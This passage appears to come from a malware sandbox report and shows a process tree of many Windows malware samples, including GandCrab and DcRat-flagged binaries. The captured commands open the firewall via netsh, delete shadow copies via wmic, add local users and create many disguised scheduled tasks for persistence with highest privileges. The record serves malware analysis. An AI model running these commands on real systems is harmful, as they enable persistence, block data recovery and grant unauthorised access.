                                              • System Location Discovery: System Language Discovery
                                              PID:2276
                                              • C:\Users\Admin\AppData\Local\Temp\evil.exe
                                                "C:\Users\Admin\AppData\Local\Temp\evil.exe"
                                                3⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                PID:3384
                                                • C:\Windows\SysWOW64\netsh.exe
                                                  netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\evil.exe" "evil.exe" ENABLE
                                                  4⤵
                                                  • Modifies Windows Firewall
                                                  PID:2756
                                            • C:\Program Files (x86)\fwclt.exe
                                              "C:\Program Files (x86)\fwclt.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              PID:1604
                                            • C:\Program Files (x86)\Gandcrab5.0.3.exe
                                              "C:\Program Files (x86)\Gandcrab5.0.3.exe"
                                              2⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              PID:1564
                                              • C:\Windows\SysWOW64\wermgr.exe
                                                "C:\Windows\System32\wermgr.exe"
                                                3⤵
                                                • Drops startup file
                                                • Enumerates connected drives
                                                • Sets desktop wallpaper using registry
                                                • System Location Discovery: System Language Discovery
                                                • Checks processor information in registry
                                                • Suspicious behavior: EnumeratesProcesses
                                                PID:3032
                                                • C:\Windows\SysWOW64\wbem\wmic.exe
                                                  "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
                                                  4⤵
                                                    PID:1632
                                              • C:\Program Files (x86)\Happy18.exe
                                                "C:\Program Files (x86)\Happy18.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Drops file in System32 directory
                                                PID:2204
                                              • C:\Program Files (x86)\kosomk.exe
                                                "C:\Program Files (x86)\kosomk.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Loads dropped DLL
                                                • System Location Discovery: System Language Discovery
                                                PID:1896
                                                • C:\Users\Admin\AppData\Roaming\dicsord.exe
                                                  "C:\Users\Admin\AppData\Roaming\dicsord.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • System Location Discovery: System Language Discovery
                                                  PID:3288
                                                  • C:\Windows\SysWOW64\netsh.exe
                                                    netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\dicsord.exe" "dicsord.exe" ENABLE
                                                    4⤵
                                                    • Modifies Windows Firewall
                                                    PID:888
                                              • C:\Program Files (x86)\LightNeuronX0.exe
                                                "C:\Program Files (x86)\LightNeuronX0.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:2712
                                              • C:\Program Files (x86)\malecus.exe
                                                "C:\Program Files (x86)\malecus.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                PID:2624
                                              • C:\Program Files (x86)\see7.exe
                                                "C:\Program Files (x86)\see7.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • System Location Discovery: System Language Discovery
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2660
                                                • C:\Program Files (x86)\see7.exe
                                                  "C:\Program Files (x86)\see7.exe"
                                                  3⤵
                                                    PID:3276
                                                • C:\Program Files (x86)\TEST.exe
                                                  "C:\Program Files (x86)\TEST.exe"
                                                  2⤵
                                                  • Executes dropped EXE
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:2664
                                                  • C:\Windows\system32\cmd.exe
                                                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\tmp580F.tmp.bat""
                                                    3⤵
                                                      PID:3788
                                                      • C:\Windows\system32\timeout.exe
                                                        timeout 3
                                                        4⤵
                                                        • Delays execution with timeout.exe
                                                        PID:1480
                                                      • C:\Users\Admin\AppData\Roaming\DriverrHub\Microsoft To Do.exe
                                                        "C:\Users\Admin\AppData\Roaming\DriverrHub\Microsoft To Do.exe"
                                                        4⤵
                                                          PID:3632
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c ""C:\Program Files (x86)\touhou virus.bat" "
                                                      2⤵
                                                        PID:2020
                                                        • C:\Windows\SysWOW64\net.exe
                                                          net user Shanghai /add
                                                          3⤵
                                                            PID:3904
                                                            • C:\Windows\SysWOW64\net1.exe
                                                              C:\Windows\system32\net1 user Shanghai /add
                                                              4⤵
                                                                PID:2080
                                                            • C:\Windows\SysWOW64\net.exe
                                                              net user Bad Apple /add
                                                              3⤵
                                                                PID:608
                                                                • C:\Windows\SysWOW64\net1.exe
                                                                  C:\Windows\system32\net1 user Bad Apple /add
                                                                  4⤵
                                                                    PID:336
                                                                • C:\Windows\SysWOW64\net.exe
                                                                  net user Marisa
                                                                  3⤵
                                                                    PID:1660
                                                                    • C:\Windows\SysWOW64\net1.exe
                                                                      C:\Windows\system32\net1 user Marisa
                                                                      4⤵
                                                                        PID:2364
                                                                    • C:\Windows\SysWOW64\net.exe
                                                                      net user Reimu /add
                                                                      3⤵
                                                                        PID:2348
                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                          C:\Windows\system32\net1 user Reimu /add
                                                                          4⤵
                                                                            PID:3376
                                                                        • C:\Windows\SysWOW64\mountvol.exe
                                                                          mountvol X:\ /d
                                                                          3⤵
                                                                            PID:3908
                                                                        • C:\Program Files (x86)\vbc.exe
                                                                          "C:\Program Files (x86)\vbc.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • Loads dropped DLL
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:2680
                                                                          • C:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exe C:\Users\Admin\AppData\Local\Temp\jplmbcuny
                                                                            3⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Suspicious use of SetThreadContext
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:1772
                                                                            • C:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exe
                                                                              C:\Users\Admin\AppData\Local\Temp\cbgsujmwws.exe C:\Users\Admin\AppData\Local\Temp\jplmbcuny
                                                                              4⤵
                                                                              • Executes dropped EXE
                                                                              • Accesses Microsoft Outlook profiles
                                                                              • outlook_office_path
                                                                              • outlook_win_path
                                                                              PID:2136
                                                                        • C:\Program Files (x86)\virus.jk.exe
                                                                          "C:\Program Files (x86)\virus.jk.exe"
                                                                          2⤵
                                                                          • Executes dropped EXE
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious use of SetWindowsHookEx
                                                                          PID:2360
                                                                      • C:\Windows\helppane.exe
                                                                        C:\Windows\helppane.exe -Embedding
                                                                        1⤵
                                                                          PID:2016
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae935535" /sc MINUTE /mo 14 /tr "'C:\Windows\ServiceProfiles\57ccb6f0bd910fed428761828ae93553.exe'" /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2332
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 5 /tr "'C:\Windows\Setup\State\powershell.exe'" /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          PID:1236
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae93553" /sc ONLOGON /tr "'C:\Windows\ServiceProfiles\57ccb6f0bd910fed428761828ae93553.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:1728
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Windows\Setup\State\powershell.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:964
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 10 /tr "'C:\Windows\Setup\State\powershell.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          PID:2788
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae935535" /sc MINUTE /mo 13 /tr "'C:\Windows\ServiceProfiles\57ccb6f0bd910fed428761828ae93553.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2892
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "kosomkk" /sc MINUTE /mo 10 /tr "'C:\Recovery\5ba42562-3a8b-11ef-9d17-d685e2345d05\kosomk.exe'" /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2652
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "Darkest Dungeon setubD" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Documents\Darkest Dungeon setub.exe'" /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:536
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "Darkest Dungeon setub" /sc ONLOGON /tr "'C:\Users\All Users\Documents\Darkest Dungeon setub.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          PID:608
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "kosomk" /sc ONLOGON /tr "'C:\Recovery\5ba42562-3a8b-11ef-9d17-d685e2345d05\kosomk.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          PID:2476
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "Darkest Dungeon setubD" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Documents\Darkest Dungeon setub.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:3000
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "kosomkk" /sc MINUTE /mo 7 /tr "'C:\Recovery\5ba42562-3a8b-11ef-9d17-d685e2345d05\kosomk.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2496
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "73c1c41b9e71c48e752a5cd19fe808b67" /sc MINUTE /mo 9 /tr "'C:\Recovery\5ba42562-3a8b-11ef-9d17-d685e2345d05\73c1c41b9e71c48e752a5cd19fe808b6.exe'" /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:1816
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "73c1c41b9e71c48e752a5cd19fe808b6" /sc ONLOGON /tr "'C:\Recovery\5ba42562-3a8b-11ef-9d17-d685e2345d05\73c1c41b9e71c48e752a5cd19fe808b6.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          PID:2460
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Windows\Cursors\dllhost.exe'" /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2248
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "73c1c41b9e71c48e752a5cd19fe808b67" /sc MINUTE /mo 9 /tr "'C:\Recovery\5ba42562-3a8b-11ef-9d17-d685e2345d05\73c1c41b9e71c48e752a5cd19fe808b6.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2856
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\Cursors\dllhost.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          PID:2872
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "BTZB" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\Start Menu\BTZ.exe'" /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2752
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Windows\Cursors\dllhost.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          PID:2888
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "BTZ" /sc ONLOGON /tr "'C:\Users\Admin\Start Menu\BTZ.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:1076
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 10 /tr "'C:\Windows\Offline Web Pages\powershell.exe'" /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:1244
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "BTZB" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Start Menu\BTZ.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:1924
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Windows\Offline Web Pages\powershell.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2932
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae935535" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\57ccb6f0bd910fed428761828ae93553.exe'" /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2428
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 5 /tr "'C:\Windows\Offline Web Pages\powershell.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2316
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae93553" /sc ONLOGON /tr "'C:\MSOCache\All Users\57ccb6f0bd910fed428761828ae93553.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          PID:748
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Recovery\5ba42562-3a8b-11ef-9d17-d685e2345d05\spoolsv.exe'" /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:1604
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "57ccb6f0bd910fed428761828ae935535" /sc MINUTE /mo 7 /tr "'C:\MSOCache\All Users\57ccb6f0bd910fed428761828ae93553.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:1996
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa7" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Microsoft\Vault\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe'" /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2440
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\5ba42562-3a8b-11ef-9d17-d685e2345d05\spoolsv.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          PID:1648
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 14 /tr "'C:\Recovery\5ba42562-3a8b-11ef-9d17-d685e2345d05\spoolsv.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2072
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\Vault\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2288
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Windows\IME\csrss.exe'" /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          PID:2528
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa7" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Microsoft\Vault\75c82fd18fcf8a51bc1b32a89852d90978fa5e7a55281f42b0a1de98d14644fa.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2668
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\IME\csrss.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2188
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "5e710462c65fe899466e4fb7c1e33c9a5" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Google\CrashReports\5e710462c65fe899466e4fb7c1e33c9a.exe'" /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          PID:1780
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Windows\IME\csrss.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:1068
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "5e710462c65fe899466e4fb7c1e33c9a" /sc ONLOGON /tr "'C:\Program Files (x86)\Google\CrashReports\5e710462c65fe899466e4fb7c1e33c9a.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:3116
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Program Files\Internet Explorer\de-DE\wininit.exe'" /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:3176
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "5e710462c65fe899466e4fb7c1e33c9a5" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Google\CrashReports\5e710462c65fe899466e4fb7c1e33c9a.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:3196
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\de-DE\wininit.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:3264
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Journal\de-DE\powershell.exe'" /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          PID:3276
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 9 /tr "'C:\Program Files\Internet Explorer\de-DE\wininit.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:3300
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "powershell" /sc ONLOGON /tr "'C:\Program Files\Windows Journal\de-DE\powershell.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          PID:3344
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "a6a1abaf12a28ea8f6553356c3bdcf57a" /sc MINUTE /mo 6 /tr "'C:\Recovery\5ba42562-3a8b-11ef-9d17-d685e2345d05\a6a1abaf12a28ea8f6553356c3bdcf57.exe'" /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:3404
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "powershellp" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Journal\de-DE\powershell.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:3424
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "a6a1abaf12a28ea8f6553356c3bdcf57" /sc ONLOGON /tr "'C:\Recovery\5ba42562-3a8b-11ef-9d17-d685e2345d05\a6a1abaf12a28ea8f6553356c3bdcf57.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:3436
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "a6a1abaf12a28ea8f6553356c3bdcf57a" /sc MINUTE /mo 12 /tr "'C:\Recovery\5ba42562-3a8b-11ef-9d17-d685e2345d05\a6a1abaf12a28ea8f6553356c3bdcf57.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          PID:3488
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Media Player\Visualizations\WMIADAP.exe'" /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:3572
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft Office\WMIADAP.exe'" /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:3668
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\Visualizations\WMIADAP.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:3712
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "WMIADAP" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Office\WMIADAP.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:3904
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Media Player\Visualizations\WMIADAP.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:4004
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "WMIADAPW" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft Office\WMIADAP.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2080
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "winhlp32w" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Portable Devices\winhlp32.exe'" /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:2216
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "Darkest Dungeon setubD" /sc MINUTE /mo 9 /tr "'C:\Users\Default\AppData\Roaming\Darkest Dungeon setub.exe'" /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:3028
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "winhlp32" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\winhlp32.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:1276
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "Darkest Dungeon setub" /sc ONLOGON /tr "'C:\Users\Default\AppData\Roaming\Darkest Dungeon setub.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:3160
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "winhlp32w" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Portable Devices\winhlp32.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:3308
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "Darkest Dungeon setubD" /sc MINUTE /mo 5 /tr "'C:\Users\Default\AppData\Roaming\Darkest Dungeon setub.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:3364
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Recovery\5ba42562-3a8b-11ef-9d17-d685e2345d05\smss.exe'" /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          PID:3460
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\fr-FR\WmiPrvSE.exe'" /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:3480
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\5ba42562-3a8b-11ef-9d17-d685e2345d05\smss.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • Process spawned unexpected child process
                                                                          PID:3640
                                                                        • C:\Windows\system32\schtasks.exe
                                                                          schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\fr-FR\WmiPrvSE.exe'" /rl HIGHEST /f
                                                                          1⤵
                                                                          • DcRat
                                                                          • Process spawned unexpected child process
                                                                          • Scheduled Task/Job: Scheduled Task
                                                                          PID:3520
                                                                        • C:\Windows\system32\schtasks.exe
